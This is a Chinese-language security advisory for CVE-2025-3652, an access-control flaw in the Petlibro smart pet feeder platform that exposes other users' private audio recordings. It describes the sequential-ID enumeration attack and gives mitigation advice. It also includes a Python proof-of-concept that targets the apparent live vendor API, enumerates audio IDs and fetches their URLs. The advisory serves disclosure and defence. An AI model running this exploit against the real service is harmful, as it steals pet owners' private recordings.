CVE-2025-3652 Petlibro智能宠物喂食器音频信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-3652

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Petlibro Smart Pet Feeder Platform

漏洞概述

CVE-2025-3652是Petlibro智能宠物喂食器平台中存在的一个信息泄露漏洞。该漏洞影响版本至1.7.31，CVSS评分5.3（中危）。漏洞源于平台在处理音频资源访问控制时存在缺陷，攻击者可以通过API端点访问其他用户的私有音频录音。攻击者利用顺序递增的音频ID和存在缺陷的音频分配端点，无需认证即可将任意音频ID绑定到自己的设备，进而获取这些音频文件的访问URL，最终导致用户隐私数据泄露。该漏洞无需用户交互，攻击者可在网络中远程利用，对用户隐私造成威胁。

技术细节

漏洞根源在于Petlibro平台的API端点存在两个关键缺陷：1) 音频ID采用顺序递增设计，攻击者可枚举猜测；2) /device/deviceAudio/use端点未正确验证用户权限和设备所有权。攻击者发送带有目标音频ID的请求到该端点，系统错误地将目标音频绑定到攻击者的设备，而未进行有效的授权检查。随后攻击者通过查询接口获取分配后的音频URL，该URL可被直接访问，导致其他用户的私有音频录音泄露。漏洞利用过程完全无需认证，攻击者仅需知道或猜测音频ID即可实施攻击。

攻击链分析

STEP 1

1

攻击者识别Petlibro平台API端点，发现/device/deviceAudio/use端点存在授权缺陷

STEP 2

2

攻击者向/device/deviceAudio/use发送HTTP POST请求，包含任意音频ID（如1-100的顺序ID）和自己的设备ID

STEP 3

3

系统错误地将目标音频ID绑定到攻击者的设备，未进行有效的所有权验证

STEP 4

4

攻击者通过/device/deviceAudio/list接口查询分配后的音频信息

STEP 5

5

系统返回音频URL，攻击者可直接访问该URL获取其他用户的私有音频录音

STEP 6

6

攻击者遍历不同音频ID，重复上述过程批量窃取用户隐私数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-3652 PoC - Petlibro Audio Information Disclosure
# Target: Petlibro Smart Pet Feeder Platform <= 1.7.31

TARGET_HOST = "https://api.petlibro.com"
ATTACKER_DEVICE_ID = "attacker_device_id_here"
TARGET_AUDIO_ID = 1  # Starting from sequential ID

def assign_audio_to_device(audio_id, device_id):
    """Assign arbitrary audio ID to attacker's device via vulnerable endpoint"""
    endpoint = f"{TARGET_HOST}/device/deviceAudio/use"
    payload = {
        "audioId": audio_id,
        "deviceId": device_id
    }
    response = requests.post(endpoint, json=payload)
    return response

def get_audio_url(device_id):
    """Retrieve audio URL after assignment"""
    endpoint = f"{TARGET_HOST}/device/deviceAudio/list"
    params = {"deviceId": device_id}
    response = requests.get(endpoint, params=params)
    if response.status_code == 200:
        data = response.json()
        return data.get("audioUrl")
    return None

def exploit():
    print("[*] Starting CVE-2025-3652 exploitation...")
    for audio_id in range(1, 100):  # Enumerate audio IDs
        print(f"[*] Trying audio ID: {audio_id}")
        assign_resp = assign_audio_to_device(audio_id, ATTACKER_DEVICE_ID)
        if assign_resp.status_code == 200:
            audio_url = get_audio_url(ATTACKER_DEVICE_ID)
            if audio_url:
                print(f"[!] Found accessible audio: {audio_url}")
                return audio_url
    print("[*] Exploitation complete")

if __name__ == "__main__":
    exploit()

影响范围

Petlibro Smart Pet Feeder Platform < 1.7.32

防御指南

临时缓解措施

如无法立即更新版本，可通过API网关对/device/deviceAudio/use端点实施访问限制，添加设备所有权验证逻辑，并启用API请求频率监控以检测异常访问模式。同时建议用户关注厂商安全公告，及时应用安全更新。